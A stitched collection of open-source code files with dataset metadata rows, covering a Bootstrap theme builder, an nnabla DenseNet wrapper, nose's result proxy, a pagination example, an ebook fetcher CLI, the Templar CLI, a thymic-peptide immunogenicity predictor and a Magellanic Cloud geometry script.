if re.search("Roboto", line):
continue
if re.search("web-font-path", line):
line = '@web-font-path2: "https://fonts.googleapis.com/css?family={0}:400,700,400italic";\n'.format(values['body']) + line
line = '@web-font-path: "https://fonts.googleapis.com/css?family={0}:300italic,400italic,700italic,400,300,700";\n'.format(values['header']) + line
line = line + '.web-font(@web-font-path2);\n'
f.write(line)
f.close()
infile = "{0}/variables.less".format(src)
f = open(infile, 'r')
lines = f.readlines()
f.close()
swap_list = {
'@brand-primary:': '@brand-primary: #00ff00',
'@brand-success:': '@brand-success: #0000ff',
'@text-color:': '@text-color: #ffffff',
'@headings-color:': '@headings-color: #00ff00',
'@border-radius-base:': '@border-radius-base: 20px',
'@border-radius-large:': '@border-radius-large: 22px',
'@border-radius-small:': '@border-radius-small: 19px',
'@component-active-color:': '@component-active-color: #00ff00',
'@btn-default-color:': '@btn-default-color: #000',
'@btn-default-bg:': '@btn-default-bg: lighten(@gray-dark, 50%)',
'@input-bg:': '@input-bg: @gray-dark',
'@input-group-addon-bg:': '@input-group-addon-bg: @gray-lighter',
'@dropdown-border:': '@dropdown-border: rgba(0,255,0,0.1)',
'@dropdown-divider-bg:': '@dropdown-divider-bg: rgba(0,255,0,0.1)',
'@dropdown-link-color:': '@dropdown-link-color: #00ff00',
'@dropdown-link-hover-color:': '@dropdown-link-hover-color: #00ff00',
'@dropdown-link-active-color:': '@dropdown-link-active-color: #00ff00',
'@navbar-default-link-hover-color:': '@navbar-default-link-hover-color: #00ff00',
'@navbar-default-link-active-color:': '@navbar-default-link-active-color: #00ff00',
'@navbar-default-brand-color:': '@navbar-default-brand-color: #00ff00',
'@navbar-default-brand-hover-color:': '@navbar-default-brand-hover-color: #00ff00',
'@navbar-inverse-link-hover-color:': '@navbar-inverse-link-hover-color: #0000ff',
'@navbar-inverse-brand-color:': '@navbar-inverse-brand-color: #0000ff',
'@navbar-inverse-brand-hover-color:': '@navbar-inverse-brand-hover-color: #0000ff',
'@navbar-inverse-toggle-hover-bg:': '@navbar-inverse-toggle-hover-bg: #8080ff',
'@navbar-inverse-toggle-icon-bar-bg:': '@navbar-inverse-toggle-icon-bar-bg: #0000ff',
'@navbar-inverse-toggle-border-color:': '@navbar-inverse-toggle-border-color: #8080ff',
'@nav-tabs-active-link-hover-color:': '@nav-tabs-active-link-hover-color: #000',
'@pagination-color:': '@pagination-color: #000',
'@pagination-bg:': '@pagination-bg: @gray',
'@pagination-hover-color:': '@pagination-hover-color: #000',
'@pagination-active-color:': '@pagination-active-color: #000',
'@pagination-disabled-bg:': '@pagination-disabled-bg: @gray',
'@state-success-text:': '@state-success-text: #000',
'@state-info-text:': '@state-info-text: #000',
'@state-warning-text:': '@state-warning-text: #000',
'@state-danger-text:': '@state-danger-text: #000',
'@tooltip-bg:': '@tooltip-bg: #000',
'@popover-bg:': '@popover-bg: lighten(@body-bg, 10%)',
'@popover-fallback-border-color:': '@popover-fallback-border-color: #999',
'@popover-arrow-outer-color:': '@popover-arrow-outer-color: fadein(@popover-border-color, 5%)',
'@popover-arrow-outer-fallback-color:': '@popover-arrow-outer-fallback-color: darken(@popover-fallback-border-color, 20%)',
'@label-color:': '@label-color: #000',
'@label-link-hover-color:': '@label-link-hover-color: #000',
'@list-group-link-heading-color:': '@list-group-link-heading-color: #000',
'@panel-primary-text:': '@panel-primary-text: #000',
'@badge-color:': '@badge-color: #000',
'@badge-link-hover-color:': '@badge-link-hover-color: #000',
'@badge-active-bg:': '@badge-active-bg: #000',
'@breadcrumb-color:': '@breadcrumb-color: #00ff00',
'@carousel-control-color:': '@carousel-control-color: #000',
# '': '',
}
outfile = values['lc'] + "/variables.less"
f = open(outfile, 'w')
for line in lines:
line = re.sub(src.title(), values['lc'].title(), line)
line = re.sub(src, values['lc'], line)
#line = re.sub('Roboto', 'Michroma', line)
for s in swap_list.keys():
if re.search(s, line):
line = swap_list[s] + ";\n"
line = re.sub('headings-font-family: @font-family-base', 'headings-font-family: @font-family-header-sans-serif', line)
if re.search("Roboto", line):
line = re.sub('Roboto', '{0}'.format(values['body']), line)
line = '@font-family-header-sans-serif: "{0}", "Helvetica Neue", Helvetica, Arial, sans-serif;\n'.format(values['header']) + line
f.write(line)
f.close()
infile = "{0}/index.html".format(src)
f = open(infile, 'r')
lines = f.readlines()
f.close()
outfile = values['lc'] + "/index.html"
f = open(outfile, 'w')
for line in lines:
line = re.sub(src.title(), values['lc'].title(), line)
line = re.sub(src, values['lc'], line)
line = re.sub('UA-[0-9\-]+', '', line)
if re.search('bootstrap.css" media="screen"', line):
line = line + ' <link rel="stylesheet" href="./bootstrap_fixes.css" media="screen">\n'
f.write(line)
f.close()
grunt = "/cygdrive/c/Users/keeshand/AppData/Roaming/npm/grunt"
cmd = "{0} swatch:{1}".format(grunt, values['lc'])
os.system(cmd)
cmd = "cp {0}/bootstrap.min.css ../{1}/pelican-themes/bootstrap3/static/css/bootstrap.{0}.min.css".format(values['lc'], values['website'])
os.system(cmd)
cmd = "cp {0}/bootstrap_fixes.css ../{1}/pelican-themes/bootstrap3/static/css/bootstrap_fixes.{0}.css".format(values['lc'], values['website'])
os.system(cmd)
if __name__ == '__main__':
main()
| mit | -6,429,890,791,821,344,000 | 53.97931 | 159 | 0.49147 | false | 3.551002 | false | false | false |
sony/nnabla | python/src/nnabla/models/imagenet/densenet.py | 1 | 2722 | # Copyright 2019,2020,2021 Sony Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from nnabla.utils.nnp_graph import NnpNetworkPass
from .base import ImageNetBase
class DenseNet(ImageNetBase):
"""
The following is a list of string that can be specified to ``use_up_to`` option in ``__call__`` method;
* ``'classifier'`` (default): The output of the final affine layer for classification.
* ``'pool'``: The output of the final global average pooling.
* ``'lastconv'``: The output from last denseblock.
* ``'lastconv+relu'``: Network up to ``'lastconv'`` followed by ReLU activation.
References:
* `Huang et al., Densely Connected Convolutional Networks.
<https://arxiv.org/abs/1608.06993>`_
"""
_KEY_VARIABLE = {
'classifier': 'DenseNet/Affine',
'pool': 'DenseNet/AveragePooling_4',
'lastconv': 'DenseNet/BatchNormalization_5',
'lastconv+relu': 'DenseNet/ReLU_5',
}
def __init__(self):
# Load nnp
self._load_nnp('DenseNet-161.nnp', 'DenseNet-161/DenseNet-161.nnp')
def _input_shape(self):
return (3, 224, 224)
def __call__(self, input_var=None, use_from=None, use_up_to='classifier', training=False, force_global_pooling=False, check_global_pooling=True, returns_net=False, verbose=0):
assert use_from is None, 'This should not be set because it is for forward compatibility.'
input_var = self.get_input_var(input_var)
callback = NnpNetworkPass(verbose)
callback.remove_and_rewire('ImageAugmentationX')
callback.set_variable('InputX', input_var)
self.configure_global_average_pooling(
callback, force_global_pooling, check_global_pooling, 'DenseNet/AveragePooling_4')
callback.set_batch_normalization_batch_stat_all(training)
self.use_up_to(use_up_to, callback)
if not training:
callback.fix_parameters()
batch_size = input_var.shape[0]
net = self.nnp.get_network(
'Train', batch_size=batch_size, callback=callback)
if returns_net:
return net
return list(net.outputs.values())[0]
| apache-2.0 | 6,252,650,887,576,425,000 | 38.449275 | 179 | 0.669361 | false | 3.764869 | false | false | false |
robertostling/efselab | scripts/conll2tab.py | 1 | 1221 | # Script to convert CoNLL files with tag+morphology into the simple two-column
# format assumed by efselab.
#
# If only the tag is required, conversion can more easily be done like this:
#
# cut -f 2,4 file.conll >file.tab
"""
cat /home/corpora/SUC3.0/corpus/conll/blogs.conll /home/corpora/SUC3.0/corpus/conll/suc-train.conll | python3 conll2tab.py ne >../suc-data/suc-blogs-ne-train.tab
cat /home/corpora/SUC3.0/corpus/conll/suc-dev.conll | python3 conll2tab.py ne >../suc-data/suc-ne-dev.tab
cat /home/corpora/SUC3.0/corpus/conll/suc-test.conll | python3 conll2tab.py ne >../suc-data/suc-ne-test.tab
"""
import sys
include_ne = 'ne' in sys.argv[1:]
for line in sys.stdin:
fields = line.rstrip('\n').split('\t')
if len(fields) >= 6:
word = fields[1]
pos = fields[3]
if pos == 'LE': pos = 'IN'
tag = pos+'|'+fields[5] if (fields[5] and fields[5] != '_') else pos
if include_ne and len(fields) >= 12:
ne = fields[10] if fields[11] == '_' else (
'%s-%s' % (fields[10], fields[11]))
lemma = fields[2]
print(word+'\t'+lemma+'\t'+tag+'\t'+ne)
else:
print(word+'\t'+tag)
else:
print()
| gpl-3.0 | -248,659,985,629,635,300 | 34.911765 | 161 | 0.600328 | false | 2.806897 | false | false | false |
mikel-egana-aranguren/SADI-Galaxy-Docker | galaxy-dist/eggs/nose-0.11.1-py2.7.egg/nose/proxy.py | 1 | 5945 | """
Result Proxy
------------
The result proxy wraps the result instance given to each test. It
performs two functions: enabling extended error/failure reporting
and calling plugins.
As each result event is fired, plugins are called with the same event;
however, plugins are called with the nose.case.Test instance that
wraps the actual test. So when a test fails and calls
result.addFailure(self, err), the result proxy calls
addFailure(self.test, err) for each plugin. This allows plugins to
have a single stable interface for all test types, and also to
manipulate the test object itself by setting the `test` attribute of
the nose.case.Test that they receive.
"""
import logging
from nose.config import Config
log = logging.getLogger(__name__)
def proxied_attribute(local_attr, proxied_attr, doc):
"""Create a property that proxies attribute ``proxied_attr`` through
the local attribute ``local_attr``.
"""
def fget(self):
return getattr(getattr(self, local_attr), proxied_attr)
def fset(self, value):
setattr(getattr(self, local_attr), proxied_attr, value)
def fdel(self):
delattr(getattr(self, local_attr), proxied_attr)
return property(fget, fset, fdel, doc)
class ResultProxyFactory(object):
"""Factory for result proxies. Generates a ResultProxy bound to each test
and the result passed to the test.
"""
def __init__(self, config=None):
if config is None:
config = Config()
self.config = config
self.__prepared = False
self.__result = None
def __call__(self, result, test):
"""Return a ResultProxy for the current test.
On first call, plugins are given a chance to replace the
result used for the remaining tests. If a plugin returns a
value from prepareTestResult, that object will be used as the
result for all tests.
"""
if not self.__prepared:
self.__prepared = True
plug_result = self.config.plugins.prepareTestResult(result)
if plug_result is not None:
self.__result = result = plug_result
if self.__result is not None:
result = self.__result
return ResultProxy(result, test, config=self.config)
class ResultProxy(object):
"""Proxy to TestResults (or other results handler).
One ResultProxy is created for each nose.case.Test. The result
proxy calls plugins with the nose.case.Test instance (instead of
the wrapped test case) as each result call is made. Finally, the
real result method is called, also with the nose.case.Test
instance as the test parameter.
"""
def __init__(self, result, test, config=None):
if config is None:
config = Config()
self.config = config
self.plugins = config.plugins
self.result = result
self.test = test
def __repr__(self):
return repr(self.result)
def assertMyTest(self, test):
# The test I was called with must be my .test or my
# .test's .test. or my .test.test's .case
case = getattr(self.test, 'test', None)
assert (test is self.test
or test is case
or test is getattr(case, '_nose_case', None)), (
"ResultProxy for %r (%s) was called with test %r (%s)"
% (self.test, id(self.test), test, id(test)))
def afterTest(self, test):
self.assertMyTest(test)
self.plugins.afterTest(self.test)
if hasattr(self.result, "afterTest"):
self.result.afterTest(self.test)
def beforeTest(self, test):
self.assertMyTest(test)
self.plugins.beforeTest(self.test)
if hasattr(self.result, "beforeTest"):
self.result.beforeTest(self.test)
def addError(self, test, err):
self.assertMyTest(test)
plugins = self.plugins
plugin_handled = plugins.handleError(self.test, err)
if plugin_handled:
return
# test.passed is set in result, to account for error classes
formatted = plugins.formatError(self.test, err)
if formatted is not None:
err = formatted
plugins.addError(self.test, err)
self.result.addError(self.test, err)
if not self.result.wasSuccessful() and self.config.stopOnError:
self.shouldStop = True
def addFailure(self, test, err):
self.assertMyTest(test)
plugins = self.plugins
plugin_handled = plugins.handleFailure(self.test, err)
if plugin_handled:
return
self.test.passed = False
formatted = plugins.formatFailure(self.test, err)
if formatted is not None:
err = formatted
plugins.addFailure(self.test, err)
self.result.addFailure(self.test, err)
if self.config.stopOnError:
self.shouldStop = True
def addSuccess(self, test):
self.assertMyTest(test)
self.plugins.addSuccess(self.test)
self.result.addSuccess(self.test)
def startTest(self, test):
self.assertMyTest(test)
self.plugins.startTest(self.test)
self.result.startTest(self.test)
def stop(self):
self.result.stop()
def stopTest(self, test):
self.assertMyTest(test)
self.plugins.stopTest(self.test)
self.result.stopTest(self.test)
# proxied attributes
shouldStop = proxied_attribute('result', 'shouldStop',
"""Should the test run stop?""")
errors = proxied_attribute('result', 'errors',
"""Tests that raised an exception""")
failures = proxied_attribute('result', 'failures',
"""Tests that failed""")
testsRun = proxied_attribute('result', 'testsRun',
"""Number of tests run""")
| gpl-3.0 | 5,547,417,367,787,775,000 | 34.386905 | 77 | 0.622876 | false | 4.195483 | true | false | false |
meowtec/page-navigator | example.py | 1 | 2364 | # coding:utf-8
html_tpl = '''
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
<style type="text/css">
.nav{
margin: 10px 0;
font-size: 12px;
font-family: "Helvetica", "Arial", sans-serif;
}
.nav a{
text-decoration: none;
color: #000;
}
.nav span{
color: #999;
}
.nav .item{
display: inline-block;
padding: 3px 8px;
margin: 0 3px;
}
.nav a.number:hover{
background: #99dddd;
color: #ffffff;
}
.nav span.current{
background: #9cc;
color: #fff;
}
.nav a.prev:hover, .nav a.next:hover{
color: #9cc;
}
h2{
margin-top: 2em;
}
</style>
</head>
<body>
<h2>基本</h2>
<div class="nav">{{html_1_1}}</div>
<div class="nav">{{html_1_2}}</div>
<div class="nav">{{html_1_3}}</div>
<div class="nav">{{html_1_4}}</div>
<div class="nav">{{html_1_5}}</div>
<div class="nav">{{html_1_6}}</div>
<h2>设置</h2>
<div class="nav">{{html_2_1}}</div>
<h2>自定义Helper</h2>
<div class="nav">{{html_3_1}}</div>
</body>
</html>
'''
from pagenavigator import PageNavigator
def string_replace(string, **data):
for key in data:
string = string.replace('{{' + key + '}}', str(data[key]))
return string
nav_1 = PageNavigator()
html_1_1 = nav_1.create(1, 5)
html_1_2 = nav_1.create(2, 5)
html_1_3 = nav_1.create(5, 5)
html_1_4 = nav_1.create(1, 6)
html_1_5 = nav_1.create(5, 6)
html_1_6 = nav_1.create(5, 10)
nav_2 = PageNavigator(link_helper='list.html?page={{page}}&from={{current}}&max={{max}}',
prev_text='←', next_text='→', more_text='……', size=9)
html_2_1 = nav_2.create(10, 20)
nav_3 = PageNavigator(number_helper='<button href="{{link}}" class="item number" data-page="{{page}}">{{page}}</button>',
current_helper='<button class="item number current" data-page="{{page}}" disabled="disabled">{{page}}</button>')
html_3_1 = nav_3.create(10, 20)
html = string_replace(html_tpl, html_1_1=html_1_1, html_1_2=html_1_2, html_1_3=html_1_3,
html_1_4=html_1_4, html_1_5=html_1_5, html_1_6=html_1_6,
html_2_1=html_2_1,
html_3_1=html_3_1
)
file_object = open('python_example.html', 'w')
file_object.write(html)
file_object.close( )
| mit | -406,984,751,838,615,360 | 24.736264 | 134 | 0.551665 | false | 2.548422 | false | false | false |
ehovind/extensible-ebook-converter | eecon_fetcher.py | 1 | 3151 | #!/usr/bin/env python
"""
This file is part of Extensible eBook Converter (EeCon),
an advanced ebook analysis and conversion tool.
Copyright (C) 2012 Espen Hovind <[email protected]>
EeCon is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Eeon is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with EeCon. If not, see <http://www.gnu.org/licenses/>.
"""
import argparse
from fetcher import fetcher as Fetcher
# ==============================================================================
# CONFIGURATION:
# ==============================================================================
WORKSPACE = "workspace/project_runeberg/"
VALID_DOMAINS = ("runeberg.org",)
# ==============================================================================
# FUNCTION:
# main()
# ==============================================================================
def main():
"""
DESCRIPTION:
PARAMETERS:
RETURN:
"""
# parse arguments
args = parse_command()
# fetch and initalize the workspace
fetcher = Fetcher.Fetcher(WORKSPACE, VALID_DOMAINS, args)
# process the arguments
fetcher.process()
# ==============================================================================
# FUNCTION:
# parse_command()
# ==============================================================================
def parse_command():
"""
DESCRIPTION:
Parse the user-provided command using argparse.
PARAMETERS:
None
RETURN:
Dictionary of command line options
"""
print "[STATUS] parsing arguments... ",
# create an ArgumentParser
parser = argparse.ArgumentParser()
# positional arguments
parser.add_argument("--auto-markup", action="store_true",
help="Automatic conversion from HTML to XHTML (best effort)")
parser.add_argument("--auto-populate", action="store_true",
help="Automatic population from Project Runeberg Pages files")
parser.add_argument("--auto-utf8", action="store_true",
help="auto convert publication files to UTF-8")
parser.add_argument("--patch", help="apply pre-made git patch")
parser.add_argument("--source",
help="fetch a ebook archive URL or filename")
parser.add_argument("--title",
help="title of publication")
# parse the command into a ArgumentParser object
args = parser.parse_args()
print "ok."
# return a dict with command line options
return vars(args)
# ==============================================================================
# MODULE:
# __name__
# ==============================================================================
if __name__ == "__main__":
main()
| gpl-3.0 | 6,881,548,638,896,659,000 | 29.009524 | 80 | 0.535386 | false | 4.954403 | false | false | false |
albert12132/templar | templar/cli/templar.py | 1 | 2179 | """Command-line interface for templar."""
from templar.api import config
from templar.api import publish
from templar.exceptions import TemplarError
import templar
import argparse
import logging
import sys
LOGGING_FORMAT = '%(levelname)s %(filename)s:%(lineno)d> %(message)s'
logging.basicConfig(format=LOGGING_FORMAT)
log = logging.getLogger('templar')
def flags(args=None):
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--source',
help='Path to a source file with Markdown content.')
parser.add_argument('-t', '--template',
help='Path to a Jinja template file')
parser.add_argument('-d', '--destination',
help='Path to the destination file.')
parser.add_argument('-c', '--config', default='config.py',
help='Path to a Templar configuration file.')
parser.add_argument('--print', action='store_true',
help='Forces printing of result to stdout, '
'even if --destination is specified')
parser.add_argument('--debug', action='store_true',
help='Enable debugging messages.')
parser.add_argument('--version', action='store_true',
help='Print the version number and exit')
if args is not None:
return parser.parse_args(args)
return parser.parse_args()
def run(args):
if args.version:
print('Templar version {}'.format(templar.__version__))
exit(0)
log.setLevel(logging.DEBUG if args.debug else logging.ERROR)
try:
configuration = config.import_config(args.config)
result = publish.publish(
configuration,
source=args.source,
template=args.template,
destination=args.destination,
no_write=args.print)
except TemplarError as e:
if args.debug:
raise
else:
print('{}: {}'.format(type(e).__name__, str(e)), file=sys.stderr)
exit(1)
else:
if not args.destination or args.print:
print(result)
def main():
run(flags())
| mit | -8,073,542,425,977,757,000 | 33.046875 | 77 | 0.58972 | false | 4.446939 | true | false | false |
hammerlab/immuno | immuno/immunogenicity.py | 1 | 5849 | # Copyright (c) 2014. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from os import environ, listdir
from os.path import exists, split, join
from mhc_common import compact_hla_allele_name
from peptide_binding_measure import IC50_FIELD_NAME
DEFAULT_PEPTIDE_DIR = environ.get(
"IMMUNO_THYMIC_PEPTIDES",
join(split(__file__)[0], "thymic_peptides"))
THYMIC_DELETION_FIELD_NAME = 'ThymicDeletion'
def _load_allele_mapping_dict(path):
"""
Since some alleles have identical peptide sets as others, we compress
the stored data by only retaining one allele from each equivalence class
and using a mappings file to figure out which allele is retained.
"""
result = {}
with open(path, 'r') as f:
for line in f.read().split("\n"):
if len(line) > 0:
k, v = line.split("\t")
result[k] = v
return result
class ImmunogenicityPredictor(object):
"""
Predict whether some T-cell in a person's circulating repertoire could
recognize a particular pattern. The subset of the 'self' proteome which
binds to an individual's HLA alleles tells us which T-cells were removed
by negative selection. T-cells inspect peptides more strongly along
interior residues (positions 3-8), so we restrict our query only to those
positions.
"""
def __init__(
self,
alleles,
data_path = DEFAULT_PEPTIDE_DIR,
binding_threshold = 500,
first_position = 3,
last_position = 8):
"""
Parameters
--------
alleles : list of strings
data_path : str, optional
first_position : int, optional
Start position for extracting substring of
query peptide (indexed starting from 1)
last_position : int, optional
Last position for extracting substring of
query peptide (indexed starting from 1)
"""
self.binding_threshold = binding_threshold
self.first_position = first_position
self.last_position = last_position
self.alleles = {
compact_hla_allele_name(allele) for allele in alleles
}
self.data_path = data_path
assert exists(self.data_path), \
"Directory with thymic peptides (%s) does not exist" % \
self.data_path
available_alleles = listdir(self.data_path)
mappings_file_path = join(self.data_path, 'mappings')
if exists(mappings_file_path):
self.allele_mappings = \
_load_allele_mapping_dict(mappings_file_path)
else:
self.allele_mappings = \
dict(zip(available_alleles, available_alleles))
self.peptide_sets = {}
for allele in self.alleles:
if allele not in self.allele_mappings:
logging.warn(
"No MHC peptide set available for HLA allele %s", allele)
continue
else:
logging.info(
"Loading thymic MHC peptide set for HLA allele %s", allele)
filename = self.allele_mappings[allele]
assert filename in available_alleles, \
"No MHC peptide set available for HLA allele %s (file = %s)" % \
(allele,filename)
with open(join(self.data_path, filename), 'r') as f:
peptide_set = {l for l in f.read().split("\n") if len(l) > 0}
self.peptide_sets[allele] = peptide_set
def predict(self, peptides_df):
"""
Determine whether 9-mer peptide is immunogenic by checking
1) that the epitope binds strongly to a particular MHC allele
2) the "core" of the peptide (positions 3-8) don't overlap with any
other peptides in the self/thymic MHC ligand sets of that HLA allele
Returns DataFrame with two extra columns:
- ThymicDeletion: Was this epitope deleted during thymic selection
(and thus can't be recognize by T-cells)?
- Immunogenic: Is this epitope a sufficiently strong binder that
wasn't deleted during thymic selection?
"""
thymic_peptide_sets = self.peptide_sets.values()
# assume a peptide is non-immunogenic unless not in thymic sets
# We do this in case some alleles are missing, resulting in all
# their associated ligands being considered non-immunogenic
peptides_df[THYMIC_DELETION_FIELD_NAME] = True
for i in xrange(len(peptides_df)):
row = peptides_df.ix[i]
peptide = row.Epitope
allele = compact_hla_allele_name(row.Allele)
if allele in self.peptide_sets:
# positions in the epitope are indexed starting from 1 to
# match immunology nomenclature
substring = \
peptide[self.first_position - 1 : self.last_position]
peptides_df[THYMIC_DELETION_FIELD_NAME].ix[i] = \
substring in self.peptide_sets[allele]
peptides_df["Immunogenic"] = \
~peptides_df[THYMIC_DELETION_FIELD_NAME] & \
(peptides_df[IC50_FIELD_NAME] <= self.binding_threshold)
return peptides_df
| apache-2.0 | -1,123,639,031,035,863,000 | 35.786164 | 80 | 0.618396 | false | 3.83541 | false | false | false |
Gabriel-p/mcs_rot_angles | aux_modules/validation_set.py | 1 | 10176 |
import os
from astropy.io import ascii
from astropy.table import Table
from astropy.coordinates import Distance, Angle, SkyCoord
from astropy import units as u
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import sys
# Change path so that we can import functions from the 'modules/' folder.
sys.path.insert(0, sys.path[0].replace('aux_', ''))
import readData
import MCs_data
def zDist(N):
"""
This function generates a uniform spread of vertical distances, in the
range (-z_dist, +z_dist).
"""
# Define maximum vertical distance (in parsec)
z_dist = 5000.
# Generate N random z' vertical distances, in parsec.
# To generate the *same* values each time the code is executed, fix the
# random seed to any integer value.
# np.random.seed(12345)
z_prime = np.random.uniform(-z_dist, z_dist, N)
return z_prime
def invertDist(incl, theta, ra_0, dec_0, D_0, ra, dec, z_prime):
"""
Inverted distance in parsecs (D) from Eq (7) in
van der Marel & Cioni (2001) using Eqs (1), (2), (3).
"""
# Express everything in radians.
incl, theta = np.deg2rad(incl), np.deg2rad(theta)
ra_0, dec_0, ra, dec = ra_0.rad, dec_0.rad, np.deg2rad(ra), np.deg2rad(dec)
# cos(rho)
A = np.cos(dec) * np.cos(dec_0) * np.cos(ra - ra_0) +\
np.sin(dec) * np.sin(dec_0)
# sin(rho) * cos(phi)
B = -np.cos(dec) * np.sin(ra - ra_0)
# sin(rho) * sin(phi)
C = np.sin(dec) * np.cos(dec_0) -\
np.cos(dec) * np.sin(dec_0) * np.cos(ra - ra_0)
# Eq (7)
D = (z_prime - D_0.value * np.cos(incl)) /\
(np.sin(incl) * (C * np.cos(theta) - B * np.sin(theta)) -
A * np.cos(incl))
return D
def rho_phi(ra, dec, glx_ctr):
"""
Obtain the angular distance between (ra, dec) coordinates and the center
of the galaxy (rho), and its position angle (phi).
"""
# Store clusters' (ra, dec) coordinates in degrees.
coords = SkyCoord(list(zip(*[ra, dec])), unit=(u.deg, u.deg))
rho = coords.separation(glx_ctr)
# Position angle between center and coordinates. This is the angle between
# the positive y axis (North) counter-clockwise towards the negative x
# axis (East).
Phi = glx_ctr.position_angle(coords)
# This is the angle measured counter-clockwise from the x positive axis
# (West).
phi = Phi + Angle('90d')
return rho, phi
def xyz_coords(rho, phi, D_0, r_dist):
'''
Obtain coordinates in the (x,y,z) system of van der Marel & Cioni (2001),
Eq (5).
Values (x, y,z) returned in Kpc.
'''
d_kpc = Distance((10**(0.2 * (np.asarray(r_dist) + 5.))) / 1000.,
unit=u.kpc)
x = d_kpc * np.sin(rho.radian) * np.cos(phi.radian)
y = d_kpc * np.sin(rho.radian) * np.sin(phi.radian)
z = D_0.kpc * u.kpc - d_kpc * np.cos(rho.radian)
x, y, z = x.value, y.value, z.value
return np.array([x, y, z])
def outData(gal, gal_data, dist_mod, e_dm):
"""
Write data to output 'xxx_input_synth.dat' file ('xxx' stands for the
processed galaxy.)
"""
data = Table(
[gal_data['Name'], gal_data['ra'], gal_data['dec'], dist_mod, e_dm,
gal_data['log(age)']],
names=['Name', 'ra', 'dec', 'dist_mod', 'e_dm', 'log(age)'])
with open(gal.lower() + "_input_synth.dat", 'w') as f:
ascii.write(data, f, format='fixed_width', delimiter=' ')
def inv_trans_eqs(x_p, y_p, z_p, theta, inc):
"""
Inverse set of equations. Transform inclined plane system (x',y',z')
into face on sky system (x,y,z).
"""
x = x_p * np.cos(theta) - y_p * np.cos(inc) * np.sin(theta) -\
z_p * np.sin(inc) * np.sin(theta)
y = x_p * np.sin(theta) + y_p * np.cos(inc) * np.cos(theta) +\
z_p * np.sin(inc) * np.cos(theta)
z = -1. * y_p * np.sin(inc) + z_p * np.cos(inc)
return x, y, z
def make_plot(gal_name, incl, theta, cl_xyz, dm):
"""
Original link for plotting intersecting planes:
http://stackoverflow.com/a/14825951/1391441
"""
# Make plot.
fig = plt.figure()
ax = Axes3D(fig)
# Placement 0, 0 is the bottom left, 1, 1 is the top right.
ax.text2D(
0.4, 0.95, r"${}:\;(\Theta, i) = ({}, {})$".format(
gal_name, theta - 90., incl),
transform=ax.transAxes, fontsize=15, color='red')
# Express in radians for calculations.
incl, theta = np.deg2rad(incl), np.deg2rad(theta)
# Plot clusters.
x_cl, y_cl, z_cl = cl_xyz
SC = ax.scatter(x_cl, z_cl, y_cl, c=dm, s=50)
min_X, max_X = min(x_cl) - 2., max(x_cl) + 2.
min_Y, max_Y = min(y_cl) - 2., max(y_cl) + 2.
min_Z, max_Z = min(z_cl) - 2., max(z_cl) + 2.
# x,y plane.
X, Y = np.meshgrid([min_X, max_X], [min_Y, max_Y])
Z = np.zeros((2, 2))
# Plot x,y plane.
ax.plot_surface(X, Z, Y, color='gray', alpha=.1, linewidth=0, zorder=1)
# Axis of x,y plane.
# x axis.
ax.plot([min_X, max_X], [0., 0.], [0., 0.], ls='--', c='k', zorder=4)
# Arrow head pointing in the positive x direction.
ax.quiver(max_X, 0., 0., max_X, 0., 0., arrow_length_ratio=.5,
length=.1, color='k')
ax.text(max_X, 0., -.5, 'x', 'x')
# y axis.
ax.plot([0., 0.], [0., 0.], [0., max_Y], ls='--', c='k')
# Arrow head pointing in the positive y direction.
ax.quiver(0., 0., max_Y, 0., 0., max_Y, arrow_length_ratio=.8,
length=.1, color='k')
ax.plot([0., 0.], [0., 0.], [min_Y, 0.], ls='--', c='k')
ax.text(-.5, 0., max_Y, 'y', 'y')
#
# A plane is a*x+b*y+c*z+d=0, [a,b,c] is the normal.
a, b, c, d = -1. * np.sin(theta) * np.sin(incl),\
np.cos(theta) * np.sin(incl), np.cos(incl), 0.
# print('a/c,b/c,1,d/c:', a / c, b / c, 1., d / c)
# Rotated plane.
X2_t, Y2_t = np.meshgrid([min_X, max_X], [0, max_Y])
Z2_t = (-a * X2_t - b * Y2_t) / c
X2_b, Y2_b = np.meshgrid([min_X, max_X], [min_Y, 0])
Z2_b = (-a * X2_b - b * Y2_b) / c
# Top half of first x',y' inclined plane.
ax.plot_surface(X2_t, Z2_t, Y2_t, color='red', alpha=.1, lw=0, zorder=3)
# Bottom half of inclined plane.
ax.plot_surface(X2_t, Z2_b, Y2_b, color='red', alpha=.1, lw=0, zorder=-1)
# Axis of x',y' plane.
# x' axis.
x_min, y_min, z_min = inv_trans_eqs(min_X, 0., 0., theta, incl)
x_max, y_max, z_max = inv_trans_eqs(max_X, 0., 0., theta, incl)
ax.plot([x_min, x_max], [z_min, z_max], [y_min, y_max], ls='--', c='b')
# Arrow head pointing in the positive x' direction.
ax.quiver(x_max, z_max, y_max, x_max, z_max, y_max, length=0.1,
arrow_length_ratio=.7)
ax.text(x_max, z_max, y_max - .5, "x'", 'x', color='b')
# y' axis.
x_min, y_min, z_min = inv_trans_eqs(0., min_Y, 0., theta, incl)
x_max, y_max, z_max = inv_trans_eqs(0., max_Y, 0., theta, incl)
ax.plot([x_min, x_max], [z_min, z_max], [y_min, y_max], ls='--', c='g')
# Arrow head pointing in the positive y' direction.
ax.quiver(x_max, z_max, y_max, x_max, z_max, y_max, length=0.1,
arrow_length_ratio=.9, color='g')
ax.text(x_max - .5, z_max, y_max, "y'", 'y', color='g')
